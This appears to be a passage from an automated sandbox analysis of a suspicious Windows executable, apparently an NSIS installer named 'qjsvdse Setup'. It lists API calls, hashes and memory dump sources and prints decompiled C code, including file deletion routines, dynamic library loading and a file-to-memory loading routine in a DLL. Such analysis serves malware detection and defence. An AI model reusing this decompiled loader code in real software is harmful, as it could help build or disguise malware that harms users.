                                                                                              0x004032cb
                                                                                              0x00000000
                                                                                              0x004032cb
                                                                                              0x00403279
                                                                                              0x00403286
                                                                                              0x0040327d
                                                                                              0x00403283
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403285
                                                                                              0x00403285
                                                                                              0x00403285
                                                                                              0x0040328a
                                                                                              0x0040328c
                                                                                              0x00403294
                                                                                              0x00403300
                                                                                              0x00403305
                                                                                              0x00403314
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403318
                                                                                              0x0040331f
                                                                                              0x00403325
                                                                                              0x0040332b
                                                                                              0x00403333
                                                                                              0x00403333
                                                                                              0x00403341
                                                                                              0x00403348
                                                                                              0x00403351
                                                                                              0x00403357
                                                                                              0x00403357
                                                                                              0x00403363
                                                                                              0x00403369
                                                                                              0x00403373
                                                                                              0x00403387
                                                                                              0x00403388
                                                                                              0x00403389
                                                                                              0x0040338e
                                                                                              0x0040339a
                                                                                              0x004033a0
                                                                                              0x004033a7
                                                                                              0x004033aa
                                                                                              0x004033b0
                                                                                              0x004033b0
                                                                                              0x004033a7
                                                                                              0x004033b4
                                                                                              0x004033ba
                                                                                              0x004033ba
                                                                                              0x004033bd
                                                                                              0x004033be
                                                                                              0x004033bf
                                                                                              0x00000000
                                                                                              0x004033bf
                                                                                              0x00403296
                                                                                              0x00403298
                                                                                              0x004032a3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004032ab
                                                                                              0x004032b6
                                                                                              0x004032bb
                                                                                              0x00000000
                                                                                              0x004032bb
                                                                                              0x00403237
                                                                                              0x00403243
                                                                                              0x00403248
                                                                                              0x0040324d
                                                                                              0x0040324f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040324f
                                                                                              0x00000000
                                                                                              0x004031ec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004031a0
                                                                                              0x004031a0
                                                                                              0x004031a0
                                                                                              0x004031a1
                                                                                              0x004031a1
                                                                                              0x00000000
                                                                                              0x004031a0
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • #17.COMCTL32 ref: 00403102
                                                                                              • SetErrorMode.KERNEL32(00008001), ref: 0040310D
                                                                                              • OleInitialize.OLE32(00000000), ref: 00403114
                                                                                                • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                                                                • Part of subcall function 00405C49: LoadLibraryA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C66
                                                                                                • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                                                              • SHGetFileInfoA.SHELL32(00428F90,00000000,?,00000160,00000000,00000008), ref: 0040313C
                                                                                                • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,qjsvdse Setup,NSIS Error), ref: 00405938
                                                                                              • GetCommandLineA.KERNEL32(qjsvdse Setup,NSIS Error), ref: 00403151
                                                                                              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 00403164
                                                                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\5.exe" ,00000020), ref: 0040318F
                                                                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403222
                                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403237
                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403243
                                                                                              • DeleteFileA.KERNEL32(1033), ref: 00403256
                                                                                              • OleUninitialize.OLE32(00000000), ref: 004032D4
                                                                                              • ExitProcess.KERNEL32 ref: 004032F4
                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\5.exe" ,00000000,00000000), ref: 00403300
                                                                                              • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\5.exe" ,00000000,00000000), ref: 0040330C
                                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403318
                                                                                              • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040331F
                                                                                              • DeleteFileA.KERNEL32(00428B90,00428B90,?,0042F000,?), ref: 00403369
                                                                                              • CopyFileA.KERNEL32(C:\Users\user\Desktop\5.exe,00428B90,00000001), ref: 0040337D
                                                                                              • CloseHandle.KERNEL32(00000000,00428B90,00428B90,?,00428B90,00000000), ref: 004033AA
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033FF
                                                                                              • ExitWindowsEx.USER32 ref: 0040343B
                                                                                              • ExitProcess.KERNEL32 ref: 0040345E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                              • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\5.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\5.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$`Ae$qjsvdse Setup$~nsu.tmp
                                                                                              • API String ID: 2278157092-695628792
                                                                                              • Opcode ID: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                                                                              • Instruction ID: aabb0dff5c64eb2fc36eb922ef2e6ed89ac062b0c308e186071ee6cedd25840a
                                                                                              • Opcode Fuzzy Hash: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                                                                              • Instruction Fuzzy Hash: F491E370908740AEE7216FA2AD49B6B7E9CEB0570AF04047FF541B61D2C77C9E058B6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 94%
                                                                                              			E00405250(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v12;
                                                                                              				struct _WIN32_FIND_DATAA _v332;
                                                                                              				signed int _t37;
                                                                                              				char* _t49;
                                                                                              				signed int _t52;
                                                                                              				signed int _t55;
                                                                                              				signed int _t61;
                                                                                              				signed int _t63;
                                                                                              				void* _t65;
                                                                                              				signed int _t68;
                                                                                              				CHAR* _t70;
                                                                                              				CHAR* _t72;
                                                                                              				char* _t75;
                                                                                              
                                                                                              				_t72 = _a4;
                                                                                              				_t37 = E004054FF(__eflags, _t72);
                                                                                              				_v12 = _t37;
                                                                                              				if((_a8 & 0x00000008) != 0) {
                                                                                              					_t63 = DeleteFileA(_t72); // executed
                                                                                              					asm("sbb eax, eax");
                                                                                              					_t65 =  ~_t63 + 1;
                                                                                              					 *0x42ebe8 =  *0x42ebe8 + _t65;
                                                                                              					return _t65;
                                                                                              				}
                                                                                              				_t68 = _a8 & 0x00000001;
                                                                                              				__eflags = _t68;
                                                                                              				_v8 = _t68;
                                                                                              				if(_t68 == 0) {
                                                                                              					L5:
                                                                                              					E0040592B(0x42afe0, _t72);
                                                                                              					__eflags = _t68;
                                                                                              					if(_t68 == 0) {
                                                                                              						E00405465(_t72);
                                                                                              					} else {
                                                                                              						lstrcatA(0x42afe0, "\*.*");
                                                                                              					}
                                                                                              					__eflags =  *_t72;
                                                                                              					if( *_t72 != 0) {
                                                                                              						L10:
                                                                                              						lstrcatA(_t72, 0x40900c);
                                                                                              						L11:
                                                                                              						_t70 =  &(_t72[lstrlenA(_t72)]);
                                                                                              						_t37 = FindFirstFileA(0x42afe0,  &_v332);
                                                                                              						__eflags = _t37 - 0xffffffff;
                                                                                              						_a4 = _t37;
                                                                                              						if(_t37 == 0xffffffff) {
                                                                                              							L29:
                                                                                              							__eflags = _v8;
                                                                                              							if(_v8 != 0) {
                                                                                              								_t31 = _t70 - 1;
                                                                                              								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                                                                              								__eflags =  *_t31;
                                                                                              							}
                                                                                              							goto L31;
                                                                                              						} else {
                                                                                              							goto L12;
                                                                                              						}
                                                                                              						do {
                                                                                              							L12:
                                                                                              							_t75 =  &(_v332.cFileName);
                                                                                              							_t49 = E00405449( &(_v332.cFileName), 0x3f);
                                                                                              							__eflags =  *_t49;
                                                                                              							if( *_t49 != 0) {
                                                                                              								__eflags = _v332.cAlternateFileName;
                                                                                              								if(_v332.cAlternateFileName != 0) {
                                                                                              									_t75 =  &(_v332.cAlternateFileName);
                                                                                              								}
                                                                                              							}
                                                                                              							__eflags =  *_t75 - 0x2e;
                                                                                              							if( *_t75 != 0x2e) {
                                                                                              								L19:
                                                                                              								E0040592B(_t70, _t75);
                                                                                              								__eflags = _v332.dwFileAttributes & 0x00000010;
                                                                                              								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                                                                              									E004055E3(_t72);
                                                                                              									_t52 = DeleteFileA(_t72);
                                                                                              									__eflags = _t52;
                                                                                              									if(_t52 != 0) {
                                                                                              										E00404CC9(0xfffffff2, _t72);
                                                                                              									} else {
                                                                                              										__eflags = _a8 & 0x00000004;
                                                                                              										if((_a8 & 0x00000004) == 0) {
                                                                                              											 *0x42ebe8 =  *0x42ebe8 + 1;
                                                                                              										} else {
                                                                                              											E00404CC9(0xfffffff1, _t72);
                                                                                              											_push(0);
                                                                                              											_push(_t72);
                                                                                              											E00405679();
                                                                                              										}
                                                                                              									}
                                                                                              								} else {
                                                                                              									__eflags = (_a8 & 0x00000003) - 3;
                                                                                              									if(__eflags == 0) {
                                                                                              										E00405250(_t70, __eflags, _t72, _a8);
                                                                                              									}
                                                                                              								}
                                                                                              								goto L27;
                                                                                              							}
                                                                                              							_t61 =  *((intOrPtr*)(_t75 + 1));
                                                                                              							__eflags = _t61;
                                                                                              							if(_t61 == 0) {
                                                                                              								goto L27;
                                                                                              							}
                                                                                              							__eflags = _t61 - 0x2e;
                                                                                              							if(_t61 != 0x2e) {
                                                                                              								goto L19;
                                                                                              							}
                                                                                              							__eflags =  *((char*)(_t75 + 2));
                                                                                              							if( *((char*)(_t75 + 2)) == 0) {
                                                                                              								goto L27;
                                                                                              							}
                                                                                              							goto L19;
                                                                                              							L27:
                                                                                              							_t55 = FindNextFileA(_a4,  &_v332);
                                                                                              							__eflags = _t55;
                                                                                              						} while (_t55 != 0);
                                                                                              						_t37 = FindClose(_a4);
                                                                                              						goto L29;
                                                                                              					}
                                                                                              					__eflags =  *0x42afe0 - 0x5c;
                                                                                              					if( *0x42afe0 != 0x5c) {
                                                                                              						goto L11;
                                                                                              					}
                                                                                              					goto L10;
                                                                                              				} else {
                                                                                              					__eflags = _t37;
                                                                                              					if(_t37 == 0) {
                                                                                              						L31:
                                                                                              						__eflags = _v8;
                                                                                              						if(_v8 == 0) {
                                                                                              							L39:
                                                                                              							return _t37;
                                                                                              						}
                                                                                              						__eflags = _v12;
                                                                                              						if(_v12 != 0) {
                                                                                              							_t37 = E00405C22(_t72);
                                                                                              							__eflags = _t37;
                                                                                              							if(_t37 == 0) {
                                                                                              								goto L39;
                                                                                              							}
                                                                                              							E0040541E(_t72);
                                                                                              							E004055E3(_t72);
                                                                                              							_t37 = RemoveDirectoryA(_t72);
                                                                                              							__eflags = _t37;
                                                                                              							if(_t37 != 0) {
                                                                                              								return E00404CC9(0xffffffe5, _t72);
                                                                                              							}
                                                                                              							__eflags = _a8 & 0x00000004;
                                                                                              							if((_a8 & 0x00000004) == 0) {
                                                                                              								goto L33;
                                                                                              							}
                                                                                              							E00404CC9(0xfffffff1, _t72);
                                                                                              							_push(0);
                                                                                              							_push(_t72);
                                                                                              							return E00405679();
                                                                                              						}
                                                                                              						L33:
                                                                                              						 *0x42ebe8 =  *0x42ebe8 + 1;
                                                                                              						return _t37;
                                                                                              					}
                                                                                              					__eflags = _a8 & 0x00000002;
                                                                                              					if((_a8 & 0x00000002) == 0) {
                                                                                              						goto L31;
                                                                                              					}
                                                                                              					goto L5;
                                                                                              				}
                                                                                              			}


















                                                                                              APIs
                                                                                              • DeleteFileA.KERNEL32(?,?,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 0040526E
                                                                                              • lstrcatA.KERNEL32(0042AFE0,\*.*,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 004052B8
                                                                                              • lstrcatA.KERNEL32(?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 004052D9
                                                                                              • lstrlenA.KERNEL32(?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 004052DF
                                                                                              • FindFirstFileA.KERNEL32(0042AFE0,?,?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 004052F0
                                                                                              • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004053A2
                                                                                              • FindClose.KERNEL32(?), ref: 004053B3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: "C:\Users\user\Desktop\5.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                              • API String ID: 2035342205-2862307936
                                                                                              • Opcode ID: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                                                                                              • Instruction ID: 18b38f57d6fcfee0f7be8354c3f8d746a349f6914723925c053c0c26f7a8b105
                                                                                              • Opcode Fuzzy Hash: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                                                                                              • Instruction Fuzzy Hash: DF512270804B54A6DB226B228C45BBF3A68CF82759F14817FFC45751C2C7BC4982CE6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6F1F24DC
                                                                                              • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,6F1F218A,7FC6FA16,6F1F2349), ref: 6F1F2506
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,6F1F218A,7FC6FA16), ref: 6F1F251D
                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,6F1F218A,7FC6FA16,6F1F2349), ref: 6F1F253F
                                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6F1F218A,7FC6FA16,6F1F2349,00000000,00000000), ref: 6F1F25B2
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,6F1F218A,7FC6FA16,6F1F2349), ref: 6F1F25BD
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,6F1F218A,7FC6FA16,6F1F2349,00000000), ref: 6F1F2608
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                              • String ID:
                                                                                              • API String ID: 656311269-0
                                                                                              • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                                              • Instruction ID: f6ff8b901819602055b28ab049bd595e0aa4421590c86d71155a26ff21d37428
                                                                                              • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                                              • Instruction Fuzzy Hash: 0E619070E01784ABDB10CFB4C894BEEB7F5AF59790F108119E511EB3A0EB34AD128B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00405C49(signed int _a4) {
                                                                                              				struct HINSTANCE__* _t5;
                                                                                              				CHAR* _t7;
                                                                                              				signed int _t9;
                                                                                              
                                                                                              				_t9 = _a4 << 3;
                                                                                              				_t7 =  *(_t9 + 0x4091f8);
                                                                                              				_t5 = GetModuleHandleA(_t7);
                                                                                              				if(_t5 != 0) {
                                                                                              					L2:
                                                                                              					return GetProcAddress(_t5,  *(_t9 + 0x4091fc));
                                                                                              				}
                                                                                              				_t5 = LoadLibraryA(_t7); // executed
                                                                                              				if(_t5 != 0) {
                                                                                              					goto L2;
                                                                                              				}
                                                                                              				return _t5;
                                                                                              			}







                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                                                              • LoadLibraryA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C66
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                              • String ID:
                                                                                              • API String ID: 310444273-0
                                                                                              • Opcode ID: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                                                                                              • Instruction ID: 3d59114c1a23b0d625c809938346f6a0554fd3dae4d1067b70da7b5bee76f7f8
                                                                                              • Opcode Fuzzy Hash: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                                                                                              • Instruction Fuzzy Hash: B4E08632A0861557E6114F309E4CD6773A8DE866403010439F505F6140D734AC11AFBA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00405C22(CHAR* _a4) {
                                                                                              				void* _t2;
                                                                                              
                                                                                              				_t2 = FindFirstFileA(_a4, 0x42c028); // executed
                                                                                              				if(_t2 == 0xffffffff) {
                                                                                              					return 0;
                                                                                              				}
                                                                                              				FindClose(_t2);
                                                                                              				return 0x42c028;
                                                                                              			}





                                                                                              APIs
                                                                                              • FindFirstFileA.KERNEL32(?,0042C028,0042B3E0,00405542,0042B3E0,0042B3E0,00000000,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 00405C2D
                                                                                              • FindClose.KERNEL32(00000000), ref: 00405C39
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              • Opcode ID: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                                                                                              • Instruction ID: 1d1880cbde17bc14012e82a4269dfe036a3ba599bb462203ffcaea8973668f8b
                                                                                              • Opcode Fuzzy Hash: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                                                                                              • Instruction Fuzzy Hash: A5D0123694DA209BD3541778BD0CC8B7A58DF593317104B32F026F22E4D7388C518EAE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 84%
                                                                                              			E0040380A(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                              				struct HWND__* _v32;
                                                                                              				void* _v84;
                                                                                              				void* _v88;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				signed int _t35;
                                                                                              				signed int _t37;
                                                                                              				signed int _t39;
                                                                                              				intOrPtr _t44;
                                                                                              				struct HWND__* _t49;
                                                                                              				signed int _t67;
                                                                                              				struct HWND__* _t73;
                                                                                              				signed int _t86;
                                                                                              				struct HWND__* _t91;
                                                                                              				signed int _t99;
                                                                                              				int _t103;
                                                                                              				signed int _t115;
                                                                                              				signed int _t116;
                                                                                              				int _t117;
                                                                                              				signed int _t122;
                                                                                              				struct HWND__* _t125;
                                                                                              				struct HWND__* _t126;
                                                                                              				int _t127;
                                                                                              				long _t130;
                                                                                              				int _t132;
                                                                                              				int _t133;
                                                                                              				void* _t134;
                                                                                              				void* _t142;
                                                                                              
                                                                                              				_t115 = _a8;
                                                                                              				if(_t115 == 0x110 || _t115 == 0x408) {
                                                                                              					_t35 = _a12;
                                                                                              					_t125 = _a4;
                                                                                              					__eflags = _t115 - 0x110;
                                                                                              					 *0x429fbc = _t35;
                                                                                              					if(_t115 == 0x110) {
                                                                                              						 *0x42eb68 = _t125;
                                                                                              						 *0x429fd0 = GetDlgItem(_t125, 1);
                                                                                              						_t91 = GetDlgItem(_t125, 2);
                                                                                              						_push(0xffffffff);
                                                                                              						_push(0x1c);
                                                                                              						 *0x428f98 = _t91;
                                                                                              						E00403CDD(_t125);
                                                                                              						SetClassLongA(_t125, 0xfffffff2,  *0x42e348); // executed
                                                                                              						 *0x42e32c = E0040140B(4);
                                                                                              						_t35 = 1;
                                                                                              						__eflags = 1;
                                                                                              						 *0x429fbc = 1;
                                                                                              					}
                                                                                              					_t122 =  *0x40919c; // 0xffffffff
                                                                                              					_t133 = 0;
                                                                                              					_t130 = (_t122 << 6) +  *0x42eb80;
                                                                                              					__eflags = _t122;
                                                                                              					if(_t122 < 0) {
                                                                                              						L34:
                                                                                              						E00403D29(0x40b);
                                                                                              						while(1) {
                                                                                              							_t37 =  *0x429fbc;
                                                                                              							 *0x40919c =  *0x40919c + _t37;
                                                                                              							_t130 = _t130 + (_t37 << 6);
                                                                                              							_t39 =  *0x40919c; // 0xffffffff
                                                                                              							__eflags = _t39 -  *0x42eb84; // 0x2
                                                                                              							if(__eflags == 0) {
                                                                                              								E0040140B(1);
                                                                                              							}
                                                                                              							__eflags =  *0x42e32c - _t133; // 0x0
                                                                                              							if(__eflags != 0) {
                                                                                              								break;
                                                                                              							}
                                                                                              							_t44 =  *0x42eb84; // 0x2
                                                                                              							__eflags =  *0x40919c - _t44; // 0xffffffff
                                                                                              							if(__eflags >= 0) {
                                                                                              								break;
                                                                                              							}
                                                                                              							_t116 =  *(_t130 + 0x14);
                                                                                              							E0040594D(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
                                                                                              							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                                                              							_push(0xfffffc19);
                                                                                              							E00403CDD(_t125);
                                                                                              							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                                                              							_push(0xfffffc1b);
                                                                                              							E00403CDD(_t125);
                                                                                              							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                                                              							_push(0xfffffc1a);
                                                                                              							E00403CDD(_t125);
                                                                                              							_t49 = GetDlgItem(_t125, 3);
                                                                                              							__eflags =  *0x42ebec - _t133; // 0x0
                                                                                              							_v32 = _t49;
                                                                                              							if(__eflags != 0) {
                                                                                              								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                                                              								__eflags = _t116;
                                                                                              							}
                                                                                              							ShowWindow(_t49, _t116 & 0x00000008);
                                                                                              							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                                                                              							E00403CFF(_t116 & 0x00000002);
                                                                                              							_t117 = _t116 & 0x00000004;
                                                                                              							EnableWindow( *0x428f98, _t117);
                                                                                              							__eflags = _t117 - _t133;
                                                                                              							if(_t117 == _t133) {
                                                                                              								_push(1);
                                                                                              							} else {
                                                                                              								_push(_t133);
                                                                                              							}
                                                                                              							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                                                              							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                                                                              							__eflags =  *0x42ebec - _t133; // 0x0
                                                                                              							if(__eflags == 0) {
                                                                                              								_push( *0x429fd0);
                                                                                              							} else {
                                                                                              								SendMessageA(_t125, 0x401, 2, _t133);
                                                                                              								_push( *0x428f98);
                                                                                              							}
                                                                                              							E00403D12();
                                                                                              							E0040592B(0x429fd8, "qjsvdse Setup");
                                                                                              							E0040594D(0x429fd8, _t125, _t130,  &(0x429fd8[lstrlenA(0x429fd8)]),  *((intOrPtr*)(_t130 + 0x18)));
                                                                                              							SetWindowTextA(_t125, 0x429fd8);
                                                                                              							_push(_t133);
                                                                                              							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                                                                              							__eflags = _t67;
                                                                                              							if(_t67 != 0) {
                                                                                              								continue;
                                                                                              							} else {
                                                                                              								__eflags =  *_t130 - _t133;
                                                                                              								if( *_t130 == _t133) {
                                                                                              									continue;
                                                                                              								}
                                                                                              								__eflags =  *(_t130 + 4) - 5;
                                                                                              								if( *(_t130 + 4) != 5) {
                                                                                              									DestroyWindow( *0x42e338);
                                                                                              									 *0x4297a8 = _t130;
                                                                                              									__eflags =  *_t130 - _t133;
                                                                                              									if( *_t130 <= _t133) {
                                                                                              										goto L58;
                                                                                              									}
                                                                                              									_t73 = CreateDialogParamA( *0x42eb60,  *_t130 +  *0x42e340 & 0x0000ffff, _t125,  *(0x4091a0 +  *(_t130 + 4) * 4), _t130);
                                                                                              									__eflags = _t73 - _t133;
                                                                                              									 *0x42e338 = _t73;
                                                                                              									if(_t73 == _t133) {
                                                                                              										goto L58;
                                                                                              									}
                                                                                              									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                                                              									_push(6);
                                                                                              									E00403CDD(_t73);
                                                                                              									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                                                              									ScreenToClient(_t125, _t134 + 0x10);
                                                                                              									SetWindowPos( *0x42e338, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                                                                              									_push(_t133);
                                                                                              									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                                                                              									__eflags =  *0x42e32c - _t133; // 0x0
                                                                                              									if(__eflags != 0) {
                                                                                              										goto L61;
                                                                                              									}
                                                                                              									ShowWindow( *0x42e338, 8);
                                                                                              									E00403D29(0x405);
                                                                                              									goto L58;
                                                                                              								}
                                                                                              								__eflags =  *0x42ebec - _t133; // 0x0
                                                                                              								if(__eflags != 0) {
                                                                                              									goto L61;
                                                                                              								}
                                                                                              								__eflags =  *0x42ebe0 - _t133; // 0x0
                                                                                              								if(__eflags != 0) {
                                                                                              									continue;
                                                                                              								}
                                                                                              								goto L61;
                                                                                              							}
                                                                                              						}
                                                                                              						DestroyWindow( *0x42e338);
                                                                                              						 *0x42eb68 = _t133;
